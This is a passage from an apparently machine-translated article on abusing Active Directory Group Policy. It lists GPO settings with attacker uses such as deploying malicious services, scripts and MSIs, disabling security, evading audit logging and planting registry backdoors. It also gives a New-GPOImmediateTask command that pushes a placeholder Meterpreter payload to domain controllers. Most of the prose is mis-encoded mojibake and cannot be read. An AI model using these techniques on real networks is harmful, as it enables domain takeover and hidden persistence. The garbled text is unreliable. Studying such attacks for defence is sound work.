Computer Configuration\Preferences\Control Panel Settings\ServicesCreate and configure new evil services
Computer Configuration\Preferences\Windows Settings\FilesAffected computers will download a file from the domain controller
Computer Configuration\Preferences\Windows Settings\INI FilesUpdate existing INI files
Computer Configuration\Preferences\Windows Settings\RegistryUpdate specific registry keys. Very useful for disabling security mechanisms, or triggering code execution in any number of ways
Computer Configuration\Preferences\Windows Settings\ShortcutsDeploy a new evil shortcut
Computer Configuration\Policies\Software Settings\Software installationDeploy an evil MSI. The MSI must be available to the GP client via a network share
Computer Configuration\Policies\Windows Settings\Scripts (startup/shutdown)Configure and deploy evil startup scripts. Can run scripts out of GPO directory, can also run PowerShell commands with arguments
Computer Configuration\Policies\Windows Settings\Security Settings\Local Policies\Audit PolicyModify local audit settings. Useful for evading detection
Computer Configuration\Policies\Windows Settings\Security Settings\Local Policies\User Rights Assignment\Grant a user the right to logon via RDP, grant a user SeDebugPrivilege, grant a user the right to load device drivers, grant a user seTakeOwnershipPrivilege. Basically, take over the remote computer without ever being an administrator on it
Computer Configuration\Policies\Windows Settings\Security Settings\RegistryAlter DACLs on registry keys, grant yourself an extremely hard to find backdoor on the system
Computer Configuration\Policies\Windows Settings\Security Settings\Windows FirewallManage the Windows firewall. Open up ports if they're blocked
Computer Configuration\Preferences\Windows Settings\EnvironmentAdd UNC path for DLL side loading
Computer Configuration\Preferences\Windows Settings\FilesCopy a file from a remote UNC path


рдЙрдкрдХрд░рдг рдирдИ GPOImmediateTask рдФрд░ SharpGPOAbuse рдЕрдиреБрдорддрд┐ рджреЗрддреЗ рд╣реИрдВ:

  • рдХрд╛рд░реНрдп рд╢реЗрдбреНрдпреВрд▓рд░ рдореЗрдВ рдХрд╛рд░реНрдп рдЪрд▓рд╛рдПрдБ
  • рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЕрдзрд┐рдХрд╛рд░ (SeDebugPrivilege, SeTakeOwnershipPrivilege, рдЖрджрд┐) рдЬреЛрдбрд╝реЗрдВ
  • рд╕реНрдЯрд╛рд░реНрдЯрдЕрдк рдХреЗ рдмрд╛рдж рдЪрд▓рдиреЗ рд╡рд╛рд▓реА рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдЬреЛрдбрд╝реЗрдВ
  • рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЛ рд╕реНрдерд╛рдиреАрдп рд╕рдореВрд╣ рдореЗрдВ рдЬреЛрдбрд╝реЗрдВ

рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП, рдХрд╛рд░реНрдп рд╢реЗрдбреНрдпреВрд▓рд░ рдореЗрдВ рдПрдХ рдХрд╛рд░реНрдп рдХреЛ рдПрдХ рдореАрдЯрд░рдкреНрд░реЗрдЯрд░ рд╕рддреНрд░ рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЬреЛрдбрд╝реЗрдВ:

 New-GPOImmediateTask -TaskName test3 -GPODisplayName "Default Domain Controllers Policy" -CommandArguments '<powershell_meterepreter_payload>' -Force 

рдирд┐рд╖реНрдкрд╛рджрди рдХреЗ рдмрд╛рдж, рд╢реЗрдбреНрдпреВрд▓ рдХрд┐рдпрд╛ рдЧрдпрд╛ рдХрд╛рд░реНрдп рдкрд░реАрдХреНрд╖рдг



рдФрд░ рдореАрдЯрд░рдкрд░реЗрдЯрд░ рд╕рддреНрд░ рдкреНрд░рдХрдЯ рд╣реЛрддрд╛ рд╣реИред





рдХрд┐рд╕реА рд╢реЗрдбреНрдпреВрд▓ рдХрд┐рдП рдЧрдП рдХрд╛рд░реНрдп рдХреЛ рд╣рдЯрд╛рдиреЗ рдХреЗ рд▓рд┐рдП, рдЖрдкрдХреЛ рдирд┐рдореНрди рдХрдорд╛рдВрдб рдЪрд▓рд╛рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИ:

 New-GPOImmediateTask -Remove -Force -GPODisplayName SecurePolicy 

рдирд┐рд╖реНрдХрд░реНрд╖


рд▓реЗрдЦ рдореЗрдВ рд╣рдордиреЗ рдХреЗрд╡рд▓ рдХреБрдЫ рдЕрдЯреИрдХ рд╡реИрдХреНрдЯрд░ рдХреА рдЬрд╛рдВрдЪ рдХреАред рдПрдиреНрдпреБрдорд░реЗрдЯ рдЕрдХрд╛рдЙрдВрдЯреНрд╕ рдФрд░ рдкрд╛рд╕рд╡рд░реНрдб рд╕реНрдкреНрд░реЗ , MS14-068 , рдкреНрд░рд┐рдВрдЯрд░ рдмрдЧ рдХрд╛ рдПрдХ рдЧреБрдЪреНрдЫрд╛ рдФрд░ рдЕрд╕рдВрдмрджреНрдз рдкреНрд░рддрд┐рдирд┐рдзрд┐рдордВрдбрд▓ рдЬреИрд╕реЗ рджреГрд╢реНрдп , рдПрдХреНрд╕рдЪреЗрдВрдЬ ( рд╢рд╛рд╕рдХ , PrivExchange , ExchangeRelayX ) рдкрд░ рд╣рдорд▓реЗ рдХрд╛рдлреА рд╣рдорд▓реЗ рдХреЗ рджрд╛рдпрд░реЗ рдХрд╛ рд╡рд┐рд╕реНрддрд╛рд░ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред

рд╣рдорд▓реЗ рдХреА рддрдХрдиреАрдХ рдФрд░ рдкрд┐рдирд┐рдВрдЧ рдХреЗ рддрд░реАрдХреЗ (рдЧреЛрд▓реНрдбрди рдЯрд┐рдХрдЯ, рд╕рд┐рд▓реНрд╡рд░ рдЯрд┐рдХрдЯ, рдкрд╛рд╕-рдж-рд╣реИрд╢, рдУрд╡рд░ рдкрд╛рд╕, рд╣реИрд╢, рдПрд╕рдЖрдИрдбреА рд╣рд┐рд╕реНрдЯреНрд░реА, рдбреАрд╕реА рд╢реИрдбреЛ, рдЖрджрд┐) рд▓рдЧрд╛рддрд╛рд░ рдмрджрд▓ рд░рд╣реЗ рд╣реИрдВ, рдФрд░ рд░рдХреНрд╖рд╛ рдЯреАрдо рдХреЛ рд╣рдореЗрд╢рд╛ рдирдП рдкреНрд░рдХрд╛рд░ рдХреЗ рд╣рдорд▓реЛрдВ рдХреЗ рд▓рд┐рдП рддреИрдпрд╛рд░ рд░рд╣рдирд╛ рдЪрд╛рд╣рд┐рдПред

Source: https://habr.com/ru/post/hi449278/


All Articles